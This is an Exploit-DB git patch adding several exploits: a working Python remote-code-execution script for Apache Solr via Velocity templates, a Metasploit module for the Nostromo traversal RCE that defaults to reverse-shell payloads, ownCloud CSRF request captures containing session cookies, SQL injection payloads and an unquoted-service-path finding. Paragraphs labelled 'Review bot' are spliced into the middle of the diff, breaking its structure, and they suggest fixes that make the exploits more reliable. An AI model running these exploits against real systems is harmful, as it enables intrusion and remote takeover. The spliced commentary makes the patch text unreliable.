From 47d2a76f4f63b2bec017333ab2699344088ed55e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 2 Nov 2019 05:01:41 +0000 Subject: [PATCH] DB: 2019-11-02 7 changes to exploits/shellcodes OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path Nostromo - Directory Traversal Remote Command Execution (Metasploit) TheJshen contentManagementSystem 1.04 - 'id' SQL Injection ownCloud 10.3.0 stable - Cross-Site Request Forgery Apache Solr 8.2.0 - Remote Code Execution --- exploits/java/webapps/47572.py | 195 +++++++++++++++++++++ exploits/linux/webapps/47571.txt | 280 ++++++++++++++++++++++++++++++ exploits/multiple/remote/47573.rb | 134 ++++++++++++++ exploits/php/webapps/47569.txt | 25 +++ exploits/unix/remote/47080.c | 2 +- exploits/unix/remote/764.c | 1 + exploits/windows/local/47570.txt | 39 +++++ files_exploits.csv | 5 + 8 files changed, 680 insertions(+), 1 deletion(-) create mode 100755 exploits/java/webapps/47572.py create mode 100644 exploits/linux/webapps/47571.txt create mode 100755 exploits/multiple/remote/47573.rb create mode 100644 exploits/php/webapps/47569.txt create mode 100644 exploits/windows/local/47570.txt diff --git a/exploits/java/webapps/47572.py b/exploits/java/webapps/47572.py new file mode 100755 index 000000000..bc1990bc6 --- /dev/null +++ b/exploits/java/webapps/47572.py 
@@ -0,0 +1,195 @@ +# Title: Apache Solr 8.2.0 - Remote Code Execution +# Date: 2019-11-01 +# Author: @l3x_wong +# Vendor: https://lucene.apache.org/solr/ +# Software Link: https://lucene.apache.org/solr/downloads.html +# CVE: N/A +# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template + +# usage: python3 script.py ip [port [command]] +# default port=8983 +# default command=whoami +# note: +# Step1: Init Apache Solr Configuration +# Step2: Remote Exec in Every Solr Node + +import sys +import json +import time +import requests + + +class initSolr(object): + + timestamp_s = str(time.time()).split('.') + timestamp = timestamp_s[0] + timestamp_s[1][0:-3] + + def __init__(self, ip, port): + self.ip = ip + self.port = port + + def get_nodes(self): + payload = { + '_': self.timestamp, + 'indexInfo': 'false', + 'wt': 'json' + } + url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores' + + try: + nodes_info = requests.get(url, params=payload, timeout=5) + node = list(nodes_info.json()['status'].keys()) + state = 1 + except: + node = '' + state = 0 + + if node: + return { + 'node': node, + 'state': state, + 'msg': 'Get Nodes Successfully' + } + else: + return { + 'node': None, + 'state': state, + 'msg': 'Get Nodes Failed' + } + + def get_system(self): + payload = { + '_': self.timestamp, + 'wt': 'json' + } + url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system' + try: + system_info = requests.get(url=url, params=payload, timeout=5) + os_name = system_info.json()['system']['name'] + os_uname = system_info.json()['system']['uname'] + os_version = system_info.json()['system']['version'] + state = 1 + + except: + os_name = '' + os_uname = '' + os_version = '' + state = 0 + + return { + 'system': { + 'name': os_name, + 'uname': os_uname, + 'version': os_version, + 'state': state + } + } + + +class apacheSolrRCE(object): + + def __init__(self, ip, port, node, command): + self.ip = ip + self.port = port + self.node = node + 
self.command = command + self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node + + def init_node_config(self): + url = self.url + '/config' + payload = { + 'update-queryresponsewriter': { + 'startup': 'lazy', + 'name': 'velocity', + 'class': 'solr.VelocityResponseWriter', + 'template.base.dir': '', + 'solr.resource.loader.enabled': 'true', + 'params.resource.loader.enabled': 'true' + } + } + try: + res = requests.post(url=url, data=json.dumps(payload), timeout=5) + if res.status_code == 200: + return { + 'init': 'Init node config successfully', + 'state': 1 + } + else: + return { + 'init': 'Init node config failed', + 'state': 0 + } + except: + return { + 'init': 'Init node config failed', + 'state': 0 + } + + def rce(self): + url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom=" + "%23set($x=%27%27)+" + "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+" + "%23set($chr=$x.class.forName(%27java.lang.Character%27))+" + "%23set($str=$x.class.forName(%27java.lang.String%27))+" + "%23set($ex=$rt.getRuntime().exec(%27" + self.command + + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+" + "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end") + try: + res = requests.get(url=url, timeout=5) + if res.status_code == 200: + try: + if res.json()['responseHeader']['status'] == '0': + return 'RCE failed @Apache Solr node %s\n' % self.node + else: + return 'RCE failed @Apache Solr node %s\n' % self.node + except: + return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0')) + + else: + return 'RCE failed @Apache Solr node %s\n' % self.node + except: + return 'RCE failed @Apache Solr node %s\n' % self.node + + +def check(ip, port='8983', command='whoami'): + system = initSolr(ip=ip, port=port) + if system.get_nodes()['state'] == 0: + print('No Nodes Found. 
Remote Exec Failed!') + else: + nodes = system.get_nodes()['node'] + systeminfo = system.get_system() + os_name = systeminfo['system']['name'] + os_version = systeminfo['system']['version'] + print('OS Realese: %s, OS Version: %s\nif remote exec failed, ' + 'you should change your command with right os platform\n' % (os_name, os_version)) + + for node in nodes: + res = apacheSolrRCE(ip=ip, port=port, node=node, command=command) + init_node_config = res.init_node_config() + if init_node_config['state'] == 1: + print('Init node %s Successfully, exec command=%s' % (node, command)) + result = res.rce() + print(result) + else: + print('Init node %s Failed, Remote Exec Failed\n' % node) + + +if __name__ == '__main__': + usage = ('python3 script.py ip [port [command]]\n ' + '\t\tdefault port=8983\n ' + '\t\tdefault command=whoami') + + if len(sys.argv) == 4: + ip = sys.argv[1] + port = sys.argv[2] + command = sys.argv[3] + check(ip=ip, port=port, command=command) + elif len(sys.argv) == 3: + ip = sys.argv[1] + port = sys.argv[2] + check(ip=ip, port=port) + elif len(sys.argv) == 2: + ip = sys.argv[1] + check(ip=ip) + else: + print('Usage: %s:\n' % usage) \ No newline at end of file diff --git a/exploits/linux/webapps/47571.txt b/exploits/linux/webapps/47571.txt new file mode 100644 index 000000000..7447fba93 --- /dev/null +++ b/exploits/linux/webapps/47571.txt 
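Review bot: In `rce()` the user-supplied command is concatenated raw into an otherwise percent-encoded query string (`"%27))+" + self.command + "%27))"`), so a command containing `&`, `#`, `%`, `+` or a single quote splits the `v.template.custom` parameter or terminates the Velocity string literal before it reaches the target; encode it with `urllib.parse.quote(self.command, safe='')` and add `import urllib.parse` beside the other imports. The success path then returns `res.text.strip().strip('0')`, presumably to drop the exit code that `$ex.waitFor()` renders into the page, but `.strip('0')` also removes every leading and trailing `0` that belongs to the real output; capturing it as `#set($rc=$ex.waitFor())` in the template keeps it out of the body instead. `init_node_config()` permanently rewrites the core's configuration through `/config` (`params.resource.loader.enabled: true`) and nothing reverts it, which the header note should state as a lasting artifact on every node the script touches. The four bare `except:` clauses also swallow `KeyboardInterrupt` and the actual `requests` error; narrow them to `(requests.RequestException, ValueError, KeyError)` so a timeout is distinguishable from a non-vulnerable host.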
@@ -0,0 +1,280 @@ +# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery +# Date: 2019-10-31 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://owncloud.org +# Software Link: https://owncloud.org/download/ +# Version: 10.3 +# CVE: N/A + +# Introduction +# Your personal cloud collaboration platform With over 50 million users +# worldwide, ownCloud is the market-leading open source software for +# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive +# and Google Drive, ownCloud offers real data security and privacy for you +# and your data. + +################################################################################################################################## + +# CSRF1 +# Create Folder + +MKCOL /remote.php/dav/files/user/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo= +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF2 +# Delete Folder + +DELETE /remote.php/dav/files/user/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI= +Origin: http://192.168.2.111 +DNT: 1 +Connection: close 
+Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF3 +# Create User + +POST /index.php/settings/users/users HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 39 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +username=test&password=&email=test@test + + + +################################################################################################################################## + +# CSRF4 +# Delete User + +DELETE /index.php/settings/users/users/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + 
+################################################################################################################################## + +# CSRF5 +# Create Group + +POST /index.php/settings/users/groups HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 7 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +id=test + + +################################################################################################################################## + +# CSRF6 +# Delete Group + +DELETE /index.php/settings/users/groups/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF7 +# Change User Full Name + +POST /index.php/settings/users/user/displayName HTTP/1.1 +Host: 
192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +displayName=user1&oldDisplayName=user + + +################################################################################################################################## + +# CSRF8 +# Change User Email + +PUT /index.php/settings/users/user/mailAddress HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 31 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +mailAddress=user1%40example.com + + +################################################################################################################################## + +# CSRF9 +# Change User Password + + +POST /index.php/settings/personal/changepassword HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; 
x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 62 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +oldpassword=1234&personal-password=1&personal-password-clone=1 + + +################################################################################################################################## + +# CSRF10 +# Change Language + +POST /index.php/settings/ajax/setlanguage.php HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 7 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +lang=tr + + +################################################################################################################################## \ No newline at end of file diff --git a/exploits/multiple/remote/47573.rb b/exploits/multiple/remote/47573.rb new file mode 100755 index 000000000..cbf10c8f6 --- /dev/null +++ b/exploits/multiple/remote/47573.rb 
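Review bot: Every one of the ten requests is shown carrying a valid `requesttoken` header, `X-Requested-With: XMLHttpRequest` and, for the settings endpoints, `OCS-APIREQUEST: true`, yet the write-up never shows the same request succeeding without them, which is the one observation a CSRF claim needs: a cross-origin form or image cannot set those headers, and the `requesttoken` mechanism exists precisely to reject forged requests. For each case, add the replayed request with the token and custom headers removed together with the response status; without that the finding is a capture of authenticated traffic rather than CSRF. CSRF9 additionally requires `oldpassword`, which a forging site does not know, and CSRF1/2 are WebDAV `MKCOL`/`DELETE` methods that a browser only issues via XHR/`fetch` after a CORS preflight, so both should be called out as constraints or dropped. The `oc_sessionPassphrase` cookie is also reproduced verbatim ten times; redacting it would shorten the advisory and avoid leaking lab session material.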
@@ -0,0 +1,134 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nostromo Directory Traversal Remote Command Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + Nostromo <= 1.9.6. This issue is caused by a directory traversal + in the function `http_verify` in nostromo nhttpd allowing an attacker + to achieve remote code execution via a crafted HTTP request. + }, + 'Author' => + [ + 'Quentin Kaiser ', # metasploit module + 'sp0re', # original public exploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-16278'], + [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'], + ], + 'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], + 'Targets' => + [ + ['Automatic (Unix In-Memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} + } + ], + ['Automatic (Linux Dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} + } + ] + ], + 'DisclosureDate' => 'Oct 20 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + )) + + register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + end + + def check + res = send_request_cgi({ + 
'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + } + ) + + unless res + vprint_error("Connection failed") + return CheckCode::Unknown + end + + if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/ + /nostromo (?[\d.]{5})/ =~ res.headers['Server'] + if Gem::Version.new(version) <= Gem::Version.new('1.9.6') + return CheckCode::Appears + end + end + + return CheckCode::Safe + end + + def execute_command(cmd, opts = {}) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'), + 'headers' => {'Content-Length:' => '1'}, + 'data' => "echo\necho\n#{cmd} 2>&1" + } + ) + end + + def exploit + # These CheckCodes are allowed to pass automatically + checkcodes = [ + CheckCode::Appears, + CheckCode::Vulnerable + ] + + unless checkcodes.include?(check) || datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + + print_status("Configuring #{target.name} target") + + case target['Type'] + when :unix_memory + print_status("Sending #{datastore['PAYLOAD']} command payload") + vprint_status("Generated command payload: #{payload.encoded}") + + res = execute_command(payload.encoded) + + if res && datastore['PAYLOAD'] == 'cmd/unix/generic' + print_warning('Dumping command output in full response body') + + if res.body.empty? + print_error('Empty response body, no command output') + return + end + + print_line(res.body) + end + when :linux_dropper + print_status("Sending #{datastore['PAYLOAD']} command stager") + execute_cmdstager + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47569.txt b/exploits/php/webapps/47569.txt new file mode 100644 index 000000000..e36df60a8 --- /dev/null +++ b/exploits/php/webapps/47569.txt 
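Review bot: `check` only recognises a `Server` header matching `/nostromo [\d.]{5}/`, so a banner such as `nostromo 1.9.10` or `nostromo 1.10.0` (longer than five characters) falls through to `CheckCode::Safe`, and because `exploit` refuses to run without `Appears`/`Vulnerable`, the module silently declines on a version it should handle; use `/nostromo (?<version>[\d.]+)/` and let the `Gem::Version` comparison on the next line decide. The named capture is rendered here as `(?[\d.]{5})`, which is not valid Ruby, so the group name was presumably lost in rendering rather than in the file itself. In `execute_command` the header key `'Content-Length:'` carries a trailing colon and would be emitted as `Content-Length:: 1` if the client writes keys verbatim; since `send_request_cgi` derives the length from `data`, that entry can be dropped. The `and` in `if res.code == 200 and ...` should be `&&` per Ruby style.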
@@ -0,0 +1,25 @@ +# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection +# Date: 2019-11-01 +# Exploit Author: Cakes +# Vendor Homepage: https://github.com/thejshen/contentManagementSystem +# Version: 1.04 +# Software Link: https://github.com/thejshen/contentManagementSystem.git +# Tested on: CentOS7 + +# GET parameter 'id' easy SQL Injection +--- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=4' AND 5143=5143-- OWXt + Vector: AND [INFERENCE] + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG + Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + Type: UNION query + Title: Generic UNION query (NULL) - 5 columns + Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh + Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT] \ No newline at end of file diff --git a/exploits/unix/remote/47080.c b/exploits/unix/remote/47080.c index d85b157f5..94f5513dc 100644 --- a/exploits/unix/remote/47080.c +++ b/exploits/unix/remote/47080.c @@ -1,7 +1,7 @@ /* * OF version r00t VERY PRIV8 spabam * Version: v3.0.4 - * Requirements: libssl-dev + * Requirements: libssl-dev ( apt-get install libssl-dev ) * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto * objdump -R /usr/sbin/httpd|grep free to get more targets * #hackarena irc.brasnet.org diff --git a/exploits/unix/remote/764.c b/exploits/unix/remote/764.c index 595a9f2b6..4931ca1e2 100644 --- a/exploits/unix/remote/764.c +++ b/exploits/unix/remote/764.c 
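Review bot: The advisory never names the script or URL that takes the `id` parameter, so a reader cannot reproduce the injection and a defender cannot locate the vulnerable query; add a `# Vulnerable URL:` line with the path and the sqlmap command that produced this output. The UNION payload shows five columns and a `'` string context, which suggests the value is interpolated unescaped into a quoted string; naming the source line would let the vendor switch that query to a prepared statement rather than guess. `# Tested on: CentOS7` should also record the database, since the time-based payload is MySQL-specific.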
@@ -1,4 +1,5 @@ /* + * E-DB Note: Updated exploit ~ https://www.exploit-db.com/exploits/47080 * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ * * OF version r00t VERY PRIV8 spabam diff --git a/exploits/windows/local/47570.txt b/exploits/windows/local/47570.txt new file mode 100644 index 000000000..5f0a4b1ba --- /dev/null +++ b/exploits/windows/local/47570.txt @@ -0,0 +1,39 @@ +# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path +# Author: Sainadh Jamalpur +# Date: 2019-10-31 +# Vendor Homepage: https://openvpn.net/ +# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe +# Version : PrivateTunnel v2.8.4 +# Tested on: Windows 10 64bit(EN) +# CVE : N/A + +# ===================================================== +# 1. Description: +# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path. + +#PoC +=========== +C:\>sc qc ovpnagent +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ovpnagent + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN +Technologies\PrivateTunnel\ovpnagent.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OpenVPN Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\> + +#Exploit: +============ +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other +security applications where it could potentially be executed during +application startup or reboot. If successful, the local user's code +would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 940f20eca..7d01591cb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
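Review bot: The PoC establishes an unquoted `BINARY_PATH_NAME` running as `LocalSystem` with `AUTO_START`, but exploitability also depends on a standard user being able to create `C:\Program.exe` or `C:\Program Files (x86)\OpenVPN.exe`, and with default Windows ACLs neither `C:\` nor `Program Files (x86)` lets an unprivileged user create a file there; the write-up should include an `icacls C:\` / `icacls "C:\Program Files (x86)"` check and state that the issue is only exploitable where those ACLs have been loosened. The description `Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path.` is circular; something like `The ovpnagent service is registered with an unquoted, space-containing path, so the service control manager will try C:\Program.exe and C:\Program Files (x86)\OpenVPN.exe before the intended binary.` says what the finding is. The Exploit section is generic boilerplate and should name the concrete candidate paths and the restart trigger (reboot, or `sc stop`/`sc start` if the user holds service-control rights).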
@@ -10740,6 +10740,7 @@ id,file,description,date,author,type,platform,port
 47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
 47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
 47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
+47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17746,6 +17747,7 @@ id,file,description,date,author,type,platform,port
 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
